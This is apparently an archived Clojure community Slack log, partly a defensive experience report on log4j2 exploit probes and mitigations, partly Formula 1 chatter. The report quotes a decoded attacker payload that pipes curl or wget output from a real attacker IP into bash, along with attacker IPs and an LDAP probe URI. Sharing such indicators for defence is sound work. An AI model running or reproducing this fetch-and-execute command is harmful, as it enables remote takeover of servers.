This page is not created by, affiliated with, or supported by Slack Technologies, Inc.
2021-12-11
Channels
- # adventofcode (42)
- # asami (13)
- # babashka (40)
- # beginners (25)
- # calva (39)
- # cider (18)
- # circleci (6)
- # cljs-dev (3)
- # clojure (39)
- # clojure-europe (16)
- # clojure-norway (9)
- # clojure-uk (2)
- # clojurescript (42)
- # datalevin (4)
- # datomic (23)
- # fulcro (33)
- # jobs (1)
- # malli (26)
- # minecraft (1)
- # off-topic (88)
- # pedestal (3)
- # polylith (8)
- # re-frame (6)
- # remote-jobs (2)
- # shadow-cljs (20)
- # tools-deps (12)
- # xtdb (5)
An experience report on the log4j2 issue -- I already posted this on another Slack where there was a very active discussion about the vulnerability: > According to our Apache logs, we've been seeing probes for this exploit since 10/Dec/2021:09:22:16 +0000 (that's UTC) and while most have seemed to be "straightforward" LDAP queries back to mostly Russian servers with no payload, presumably just to test whether JNDI lookup was succeeding via logging, we've also seen some requests in this format:
access_log:45.155.205.233 - - [10/Dec/2021:18:22:04 +0000] "GET / HTTP/1.1" 302 132 "-" "${jndi:}"
which did not get logged via log4j2 but decodes to
(curl -s 45.155.205.233:5874/x.x.x.x:80||wget -q -O- 45.155.205.233:5874/x.x.x.x:80)|bash
where x.x.x.x is the server's public IP address -- so, if executed, that would download and run an arbitrary shell script on your server!
> All our servers were running log4j2 2.14.1 already so we added `-Dlog4j2.formatMsgNoLookups=true` as a JVM option and restarted everything.
> Our next production build will include log4j2 2.15.0 for everything.
> It looks like the ports used in the LDAP requests are rotating. So I assume the attacking program starts a listener on a random port, probes a remote server sending that port number, waits for an appropriate time for a response, and then shuts down the listener and switches to a new port. We were seeing multiple requests from the same IP addresses, specifying the same LDAP hosts (using a different IP address), with multiple ports.
> One batch of probes used this LDAP URI <ldaps://d71f9297.probe001.log4j.leakix.net:12042> where the prefix segment before .probe001 was a random hex string. Again, rotating listeners to make it harder to figure out what the probe was doing.
> All the early probes came from this IP 128.14.102.187 (a Russian server). The fancy http://leakix.net stuff came from 167.71.13.196 (which is running on Digital Ocean). Some of the Basic/Command probes came from 45.137.21.9 (Bangladesh), others from 45.155.205.233 (Russia).I too saw the curl bash probe attempt, crazy stuff
Thanks you for sharing. I've x-posted to a couple of other slacks (with attribution, of course).
really baffled by why log4j people thought it's a good default behavior to do lookups inside of %m for stuff that can trigger network activity
who even thinks of such madness 🙂
whilst many run newer jvm versions that don't execute remote java code, the machines with vulnerable log4j versions are still a massive array of DDoS boxes (you can nuke themselves by specifying non existing ldap targets or nuke others by telling that their :443 or :80 is the ldap server)
at times like these though it is good if you have been very strict on keeping codebase up to date and deployable so you can roll out the log4j update even to hundreds of microservices quickly
The defaults in "newer jvm versions" only suppress some vectors, as I understand it. There are still lookups-by-default enabled for this current CVE on modern JDKs -- at least that's what I get from a lot of the security analyses...
But, yeah, opting people into arbitrary code substitution by default seems like a spectacularly bad decision.
When t.d.a. added the prep-lib stuff, my first thought was "why doesn't it do it automatically for me?" and then I thought "hmm, arbitrary code execution" and realized it was probably a really good idea that you get a list of libs that expect you to "prep" them and you have to opt into that explicitly so you can review what they actually do. Not that we already examine every new dependency we add to projects in general I guess, despite the "launch missiles" possibility of automatically executed initialization code... 🤷:skin-tone-2:
So the probing started maybe 24 hours ago, making this truly a "zero-day" exploit and it certainly includes at least some explicit RCE attempts.
is lein deps :tree | grep log4j
sufficient to tell if we’re running a vulnerable version?
yes You can automate it as well with https://github.com/rm-hull/nvd-clojure in case your dep tree changes in a future (or new CVEs pop up, oc)
Any idea why lein deps :tree | grep log4j
would return no results, but jar tf uberjar.jar | grep log4j
shows that log4j was included?
profiles matter, try something like lein with-profile -user,-dev,+uberjar deps :tree
or whatever profile combination is closer to production / your uberjarring process
I have a pretty extensive test matrix which I'd want to add as a GH status check. Can't one add the whole GH Actions workflow instead of each job individually?
https://github.blog/2021-11-29-github-actions-reusable-workflows-is-generally-available/
not sure if that has to do, my problem is that when I'm in the Branch protection rule
page I have to add every single job from the matrix as a status check. If the matrix has 30 items total I have to click around 30 times, there has to be a better way
Final qualifying for formula 1 in the books. Championship leaders are exactly tied and it's a heads up race winner takes all.
I'm sure it will be a casual start tomorrow. Will be interesting to see how the tire start plays out
Yeah that flat spot might be incredibly important. Hope we have a clean getaway. And hopefully checo can stay in the mix
But the race pace of the Mercedes' might prove too much. Maybe a two stop strategy and a late charge to the finish
I hope max can do it but I doubt it. He should have had it wrapped up by now if not for a puncture, being punted off by Hamilton and being punted off by Bottas.
Oscar piastri has been incredible in his rookie F2 season, sealing the championship with five consecutive pole positions. If you have F1 tv you can watch the whole F2 and F3 seasons. And they are great racing
I'm actually happy that both drivers are on different strategies. This will spice things up. Not sure if my heart rate can get any higher but it will be exciting!
Hamilton is not just lucky, he's an amazing driver. I'm team Red Bull but respect to him
100%. He is incredible. Such a good driver the queen knighted him and as far as I know the only driver to be active when a part of a track was named after him. I'm hoping he does what he has always done, and hope that max and Red Bull can rise to that high bar and take the last championship in these regulations
what a freaking end, omg
gonna be fighting about this for a long time
i wanted max to win, but I've never seen a race in 20+ years where they only allow n cars to unlap themselves to intentionally allow 2 cars to get close at front
yeah, that was crazy
I mean, I can see race control wanting to set up a situation where the two clear leaders get to dog fight but hard to say it was "fair"
Hamilton just sitting in his car
oh there might be a legitimate protest. only 5 cars were allowed to unlap, not the whole field
I didn't understand why they retired perez?
it would be great to see Ferrari and McLaren more regularly in the top mix and not just Merc and RB
i'm hoping for a better mix of performance next year in addition to closer following due to aero changes. I've really enjoyed F2 and F3 for this reason
checo did the best lap at 5+ seconds off the pace and holding lewis behind. that was absolutely amazing
those two rules are procedure for resuming race after safety car and passing a car under safety car
i don't think the protest against max will go anywhere. i don't think anyone has any idea what to do about the protest against the race resumption
Overtaking under the safety car protest is dismissed https://twitter.com/msportxtra/status/1470097033579188232?s=21
I think if winning the title was decided over something as petty as that Mercedes would have looked really bad
One of the commentators on sky mentioned that Merc might threaten to leave if they aren't given the championship
If that's true, I wouldn't believe anything red bull says, it just means this gets sorted in court over the next few months
Just hope it doesn't drag on till next season. Regardless of who wins in the end, I don't think this is good for the sport
I can't imagine a world championship decided in court, by lawyers arguing over the meaning of a certain phrase in some paragraph buried in 100s of pages of regulations
Mercedes have notified they will appeal. Apparently the procedure is 48 hours of gathering data and putting together a case. I don't know which authority it goes to though. FIA or some higher sports authority
UNless we lose, then we appeal and win it in the court, you know given how dominant merc have been for so long, its kinda embarrasing to see them losing this badly.
Interesting theory I saw online about checos retirement. Pure speculation but a guess his car was only fueled for 3/4 of the race distance to improve his pace. Complete speculation but I'm in awe and it sounds like something Horner could try
anyway, I'm glad max won. but the race directing and stewarding has been appalling the last few races
I’m aware of a maximum fuel limit and max fuel flow rate. Never have heard of a minimum except for a required 0.7 liter fuel sample required of all cars classified. And if you plan on retiring doesn't seem applicable
Log4J is on the Mars Rover 2020 helicopter: https://twitter.com/TheASF/status/1400875147163279374
So the first interplanetary pwnage is up for grabs, but the latency is going to be a PITA 😝
Sounds like the next plot line (or should I say ... exploit line) for Star Trek Discovery https://youtu.be/A7B_ZWQFsYI